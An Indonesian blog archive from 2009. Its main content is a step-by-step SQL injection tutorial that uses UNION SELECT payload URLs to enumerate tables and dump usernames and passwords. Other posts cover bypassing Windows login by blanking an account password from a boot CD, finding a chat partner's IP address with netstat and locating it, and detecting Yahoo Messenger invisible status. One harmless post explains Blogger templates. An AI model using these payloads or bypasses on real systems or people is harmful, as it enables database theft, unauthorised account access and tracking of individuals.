Tuesday, September 1, 2009

cara mengetahui IP address lawan atau teman chatting anda di YM ( Yahoo Messenger)

Nomor IP address adalah sebuah "KTP" yang memberikan anda sebuah identitas di internet, dan dengan nomor ini jugalah anda bisa di tangkap karena melakukan tindakan kejahatan di internet.

saya lebih suka menyebut nomor ip ini dengan alamat IP atau Ip address karena nomor ini lah yang menunjukan alamat anda berada.

untuk melihat nomor Ip komputer anda, gunakan perintah ipconfig di cmd cara nya adalah sebagai berikut :

untuk pengguna windows klik start>run> ketik "cmd" (tanpa tanda kutip) lalu tekan enter
jendela cmd atau command akan terbuka, lalu ketik "ipconfig" (tanpa tanda kutip) lalu tekan enter..nah di situ akan terlihat IP address anda

lalu bagaimana cara untuk mengetahui IP addres lawan atau teman chat anda di YM...? ok langsung aja..
Langkahnya sebagai berikut :

1. Login ke YM
2. Ajak chat siapa saja yang ingin anda ketahui ip addressnya
3. Buka cmd anda… ketik netstat kemudian tekan enter
4. Akan ada banyak proses yang terlihat
5. Kirim file apa saja kepada lawan chat lewat YM
6. Saat proses terjadi, pada jendela cmd, ketik netstat sekali lagi kemudian enter
7. Maka akan terlihat sebuah IP contohnya seperti ini :

202.174.158.14:5101 SYN_SENT

8. Nah.. itu dia ip address lawan chat anda.. ipnya adalah

202.174.158.14

9. Jika belum jelas, anda bisa menggunakan command netstat -n, maka akan keluar ip address dan port dalam numerik

YM menggunakan port 5101 untuk mengirimkan file. Proses pengiriman file tentunya terjadi secara P2P dan dengan fitur netstat, akan terlihat IP address lawan chat yang anda kirimi file..

untuk mengetahui keberadaan lokasi lawan atau teman chat anda,,masuk ke situs ini

http://www.ip-adress.com/ip_tracer/

lalu masukkan ip address teman chat anda, lalu klik Track IP,host or website

selamat mencoba................. ;) ;) ;)

sumber : s'to and l3nk

baca selengkapnya......

Mendeteksi Status Invisible Yahoo Messenger

(chatting) dengan Yahoo Messenger adalah salah satu aktivitas sering dipakai.

Kadang disaat ingin mengobrol dengan teman via YM, ternyata status yang ditampilkan offline sehingga kita tidak bisa mengobrol dengannya.


berikut adalah trik untuk mendeteksi teman yang benar - benar offline atau tidak

untuk mendeteksinya anda tinggal masuk kesitus di bawah ini,pilih salah satu yg anda suka,lalu cukup mengisinya dengan user name yang ingin anda deteksi...berikut situs2 nya :

http://www.invisible-scanner.com/
http://www.ydetector.com/
http://www.4invisible.com/
http://www.invisible.ir/
http://www.detectinvisible.com/
http://www.statusdetect.com/
http://www.invisibleyahoo.com/
http://www.yahoo-status.com/
http://www.2oost.com/
http://www.buzzu.info/
http://www.vizgin.com/
http://www.yahootracer.com/
http://www.yahoo-on.net/

baca selengkapnya......

Monday, August 31, 2009

Tutorial SQL Injection

Tutorial ini saya dapat dari master2 hacking di forum yang membahas tentang hacking..
oke langsung ajah...

SQL injection merupakan teknik yang dilakukan para hacker untuk masuk ke sebuah sistem atau situs dengan memberikan perintah atau query SQL melalui metode GET atau POST memanfaatkan kelemahan sistem di dalam URL web dan mendapatkan akses informasi dari database. Kelemahan sistem di sini bisa berasal dari script atau programnya sendiri atau dari dalam server.(Singkatnya begitu lah..)

berikut adalah langkah2 sql injection :

1. cek vulnerabilitas suatu website

Untuk mengecek apakah suatu site memiliki bug kita dapat menggunakan cara-cara berikut :

a. Letakkan tanda ' pada akhir url address bar.

cth :
http://www.target.com/index.php?pageID=1' (tanda ' diletakkan di belakang url address bar)

Jika muncul error yang mirip seperti :

Warning: “mysql_fetch_array(): supplied argument is not a valid MySQLresult resource in /www/web/contoh.com/news.php on line 99… bla bla bla…”

atau mirip mirip seperti:

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

atau error yang sejenis, itu berarti site bisa kita Attack menggunakan SQL injection.

b. Gunakan Operator Logika.
Anda bisa gunakan operator and,or,dll.

Ex 1 : and 1=1
cth:
http://www.target.com/index.php?pageID=1+AND+1=1/* Return True, artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.

Ex 2 : and 1=2
cth :
http://www.target.com/index.php?pageID=1+AND+1=2/* Return False, artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.

Note : jangan lupa letakan tanda /* atau -- di paling blakang URL dan Untuk menggunakan operator logika tergantung dengan kebutuhan yang diperlukan. Selain itu kekreatifitasan kita dituntut disini. Kenapa? karena kadang ketika kita meletakkan operator logika, situs tidak memberi respon apa-apa. Untuk itu, kekreatifitasan anda di perlukan disini. Bagaimana anda membangkitkan error. Hehehehehehe :)

2. Cek Kolom.

Setelah kita mengetahui bahwa suatu site memiliki bug sql injection, maka tahap selanjutnya adalah mengecek kolom yang ada. Untuk mengecek kolom, kita dapat gunakan statement "ORDER By x", dimana x adalah nilai increment dari integer 1,2,...dst. Increment maksudnya adalah lakukan penambahan nilai x sampai ditemukan pesan error seperti "... Unknown Colomn 'x' ...".

cth :
http://www.target.com/index.php?pageID=1+ORDER+BY+1/* ga ada error
http://www.target.com/index.php?pageID=1+ORDER+BY+2/* ga ada error
http://www.target.com/index.php?pageID=1+ORDER+BY+3/* ga ada error
http://www.target.com/index.php?pageID=1+ORDER+BY+4/* ga ada error

Intinya kita naikkan angkanya sampai kita dapatkan Error !!

http://www.target.com/index.php?pageID=1+order+by+5/* error

Note : Kita asumsikan bahwa ketika kita memasukkan nilai 5, maka muncul pesan error "Unknown Colomn '5'", maka kita dapat menarik suatu kesimpulan bahwa kolom yang ada hanya 1,2,3, dan 4.

3. Cek Hole Pada Kolom.

Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament " UNION ALL SELECT " atau " UNION SELECT " ,dll.

Note : Ingat!!!jangan lupa menggunakan karakter "-", seperti dibawah ini :

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3,4/*

Note : Jika di layar halaman setelah loading muncul angka, misal 2 atau 3 atau keduanya. maka kolom tersebut yang bermasalah. Bagaimana cara kita mengetahuinya ? kita bisa lihat pada page, karena kolom yang bermasalah tersebut nantinya akan ditampilkan pada page. Lagi-lagi kejelian mata dan kekreatifitasan kita di butuhkan disini!!!


4. Cek Versi MYSQL.

Tadi dari nomer 3, muncul angka 2 dan 3. Sekarang kita gunakan kolom nomor 2 atau 3 itu untuk mengecek versi MySQL.disini saya menggunakan kolom nomor 2. Mengapa perlu mengecek versi dari MySQL? karena teknik sql injection untuk v 4.xx atau v 5.xx tidak sama. Pada paper ini saya menggunakan v 5.xx.

Untuk mengecek versi mysql kita bisa gunakan statement "@@version,version(),dll" tergantung kebutuhan system.

cth:
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,version(),3,4/*
Hasilnya akan muncul versi MySQL, misal versi 5.0 atau versi 5.x.x

klo tidak mucul coba pake :

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,@@version,3,4/*

atau

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,convert(@@version+using+latin1),3,4/*

atau

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,unhex(hex(@@version)),3,4/*


5. Cek Tabel dan Kolom.

a. Cek Tabel.

Untuk mengecek tabel gunakan statement berikut : " information_schema.tables + table_name "
cth :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3,4+from+information_schema.tables/*


Note : Jika page tidak meload informasi tabel, gunakan convert() atau unhex(hex()) atau lainnya. - Gunakan statement Limit untuk mengekstrak tabel yang ada.

cth :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3,4+from+information_schema.tables+limit+1,1/* <=== Lakukan increment pada angka 1,1 sampai kita temukan informasi tabel yang berguna, seperti user,username,admin,administrator,dll

b. Cek Kolom Cara pengecekan kolom hampir sama dengan pengecekan tabel, hanya saja pada pengecekan kolom kita gunakan statement berikut : " information_schema.columns ... column_name ... "

cth :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3,4+from+information_schema.columns/*

Note : Gunakan Statment Limit untuk mengekstrak kolom-kolom yang ada.

Tips : Untuk mengekstrak kolom pada tabel tertentu kita bisa gunakan statement berikut :

cth: http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3,4+from+information_schema.columns+where+table_name='user'/* <=== kita asumsikan kita telah mengetahui bahwa terdapat tabel user.

Note : Seperti biasa untuk mengekstrak kolom-kolom tersebut kita gunakan statement LIMIT.

6. Get Value of Colomn.

Setelah kita ketahui nama-nama kolom yang ada pada table, maka langkah selanjutnya adalah mengekstrak nilai-nilai tersebut. Untuk mengekstrak nilai tersebut kita bisa melakukannya secara satu persatu dan atau secara keseluruhan atau bersamaan.

Note : Asumsikan bahwa kita mengetahui bahwa table user memiliki kolom 'username' dan 'password'.

a. Secara satu per satu.

cth:
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,username,3,4+from+user/*

cth :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,password,3,4+from+user/*

b. Secara keseluruhan atau bersamaan. Gunakan statement concat() atau concat_ws()

cth :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,concat(username,0x3a,password),3,4+from+user/* <=== 0x3a adalah hexa dari karakter ' : '

Note : Jika anda ingin mengetahui lebih jelas mengenai tutorial ini silahkan lihat video tutorialnya bisa anda download di sini http://www.ziddu.com/download/6295229/SqlInjectionVideo.rar.html

selamat mencoba....

baca selengkapnya......

Wednesday, August 26, 2009

Mereset / Melewati Proteksi Password Windows NT,2000, XP, dan 2003

Anda lupa password Windows XP yang Anda miliki?

Hal ini pernah dialami pada teman saya,,,
Mudah – mudahan yang saya tulis kali ini dapat membantu anda dalam mengatasi masalah ketika menghadapi yang dialami teman saya tsb….

Langsung saja….

Untuk mereset password Windows cara nya adalah sebagai berikut :

siapkan software reset password windows (cd040818.iso),bisa anda download disini
http://www.ziddu.com/download/6102984/Reset_Pass_Windows.rar.html
(paket dalam bentuk/format iso)

setelah selesai di download….buka file cd040818.iso dengan software burner seperti Nero atau software burner lainnya lalu anda burn di CD..

setelah selesai di burn ke dalam CD…masukan CD tersebut ke computer target(computer yg ingin anda reset password nya)

boot computer target melalui CD

kemudian tunggu. Setelah melalui proses booting yang
panjang, maka sampailah kamu pada opening screen dari program ini. Seperti berikut :

Selanjutnya, biarkan program ini akan bekerja dengan sendirinya, prosesnya akan berlangsung selama
beberapa detik, sampai kemudian kamu akan berhenti pada langkah pertama (Step ONE):



Muncul keterangan bahwa terdapat enam (6) partisi seperti pada gambar diatas (ini pada komputer saya,tentunya akan beda nantinya kalau dijalankan di komputer kamu...). Intinya program ini akan membaca partisi dari kompie kamu. Lanjut, tentukan letak partisi Windows XP kamu berada, sesuaikan dengan system komputer kamu. Pada kasus ini (kompie saya) partisi Windows XP berada pada partisi 1.

Ketik “1” (ndak pake’ tanda kutip) dan tekan enter, maka kamu akan melihat tampilan proses yang selanjutnya membawa kamu ke langkah kedua (Step TWO) :

Langkah kedua adalah memilih lokasi dari file registry. File registry pada umumnya terletak pada :
- Winnt35/system32/config untuk NT 3.51
- Winnt/system32/config untuk NT 4 dan Windows 2000
- Windows/system32/config untuk Windows XP dan 2003

Karena dalam percobaan kali ini saya menggunakan windows XP dan juga menggunakan directory default, maka saya memasukan Windows/system32/config atau bisa langsung menekan tombol Enter karena sama dengan nilai default yang ditunjukkan dalam tanda kurung siku, yaitu [Windows/system32/config] pada gambar diatas

Selanjut nya akan bermunculan pesan-pesan seperti pada gambar berikut :

Untuk langkah ini, kamu pilih angka “1” Password reset [sam system security](ingat ndak pake’ tanda kutip), maka akan tampil keterangan :

Yang diikuti dengan tampilan bertubi-tubi dari keterangan file registry, hingga berhenti dan menampilkan pilihan menu, untuk saatini kamu akan memasuki langkah ke tiga (Step THREE) seperti pada gambar dibawah :

Selanjutnya kamu tinggal mengetik “1” dan enter, akan bermunculan data dari account Windows XP

Kemudian, tinggal mengetik user account yang akan dijebol ;-) dan menekan enter. Untuk kasus ini saya akan mengetikkan Clear_Screen ( ini account yang akan dikerjai )...
lalu akan menampilkan data dari user account yang bernama Clear_Screen ini :

Untuk saat ini, kamu disuruh untuk mengetikkan tanda * (bintang / asterisk) untuk blank password........ Jika kamu mengetik tanda * dan tekan enter, muncul keterangan bahwa proses blanking password sedang dikerjakan.
Kemudian akan muncul peringatan bahwa apakah kamu benar ingin menggantinya? Jawab “y” diikuti dengan menekan enter !!!

Setelah proses diatas, kemudian kamu akan mendapatkan pesan seperti tampilan dibawah ini :

Silahkan kamu ketik “!” (tanda seru) diikuti dengan enter, dan kamu akan dibawa kembali ke tampilan menu awal, yakni :

Kemudian, ketik “q” (quit), yang akan menghasilkan keterangan bahwa terdapat beberapa perubahan, seperti ditunjukkan pada gambar dibawah :

Setelah keterangan tadi, kamu akan dibawa ke langkah ke empat (Step FOUR)

Akan ditanya lagi apakah kamu benar-benar ingin melakukan perubahan, dan menulisnya
kembali ? , silahkan ketikkan “y” dan tekan enter, Proses akan berjalan dan menampilkan
keterangan writing sam, kemudian jika semuanya lancar, maka kamu akan mendapatkan pesan yang mengatakan proses pengeditan telah selesai, seperti tampilan dibawah :

Untuk sekarang ini, kamu telah memasuki langkah yang terakhir, untuk keluar tekan CTRL+ALT+DEL, dan proses reboot akan berlangsung. Untuk saat ini tekan saja CTRL+ALT+DEL, dan reboot/ restart computer target........

Setelah restart jangan kaget dengan proses checking file system yang dilakukan oleh computer karena ini adalah langkah normal. Setelah proses checking selesai, anda bisa menggunakan account yang telah anda rubah / reset password nya.

Selesai…….mudah bukan????
selamat mencoba..... :) :) :)
Mohon sarannya maklum masih newbie….hehehe

Sumber : xcode magazine 8

baca selengkapnya......

Wednesday, August 19, 2009

Cara Membuat read more/baca selengkapnya di blog

cara ini saya dapat di blog nya Kendhin,,saya hanya ingin memposting ulang sekaligus menjadikan postingan ini sebagai arsip saya,untuk menambah ilmu pengetahuan tentang blog....

kita sering melihat postingan yang terlalu panjang dihalaman utama blog hanya ditampilkan sebagian dan disertai link read more / baca selengkapnya...

untuk membuat nya seperti itu cara nya adalah sebagai berikut :


1. Buka menu Layout kemudian pilih Edit HTML
2. Kasih tanda cek (centang) pada cekbox "expand widget template"
3. Cari kode berikut di Template blog kamu


<p><data:post.body/></p>

jika anda tidak menemukan kode tersebut cari kode ini :

data:post.body/

4. Kalau sudah ketemu, Ganti kode kode tersebut sehingga menjadi seperti ini

<b:if cond='data:blog.pageType == "item"'>
<style>.fullpost{display:inline;}</style>
<p><data:post.body/></p>
<b:else/>
<style>.fullpost{display:none;}</style>

<p><data:post.body/></p>

<a expr:href='data:post.url'>Read More......</a>
</b:if>


Tulisan "Read More....." bisa kamu ganti menjadi "Baca Selegkapnya" atau sesuai dengan keinginan anda.

5. Simpan hasil pengeditan.
6. Kemudian pilih menu Setting lalu pilih Formatting
7. Pada kotak Post Template isikan kode berikut:


<span class="fullpost">


</span>


8. Kemudian Simpan.
9. Ketika anda ingin memposting, ada 2 tab pilihan tuh, yang "Compose" dan "Edit Html", kamu pilih "Edit HTML", Maka secara otomatis akan tampak kode seperti berikut


<span class="fullpost">


</span>


10. Letakkan tulisan yang ingin kamu tampilkan dihalaman utama diatas atau sebelum kode ini<span class="fullpost">
sementara sisanya letakkan di antara kode<span class="fullpost">
dan</span>


cth :
tulisan anda yg ingin ditampilkan di halaman utama

<span class="fullpost">
sisa dari tulisan anda
</span>

11. selesai selamat mencoba.......thanks to Kendhin


sumber :
http://trik-tips.blogspot.com/2007/12/cara-membuat-read-more-baca.html?showComment=1250677184756#c8981180268114305575


baca selengkapnya......